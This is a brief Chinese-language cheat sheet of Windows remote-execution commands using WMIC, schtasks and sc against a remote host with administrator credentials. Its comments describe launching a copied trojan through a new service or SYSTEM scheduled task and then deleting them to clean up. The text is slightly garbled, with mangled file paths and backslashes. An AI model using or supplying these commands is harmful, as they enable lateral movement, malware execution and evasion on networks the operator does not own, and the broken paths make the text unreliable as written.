WMIC远程运行命令
wmic /node:host /user:administrator /p 密码 process call create “c:windows empfoobar.exe”
schtasks计划任务远程运行
schtasks /create /tn foobar /tr c:windows empfoobar.exe /sc once /st 00:00 /S host /RU System
schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host ##清除schtasks
SC添加服务远程运行命令
sc \host create foobar binpath=“c:windows empfoobar.exe” ##新建服务,指向拷贝的木马路径
sc \host start foobar ##启动建立的服务
sc \host delete foobar ##完事后删除服务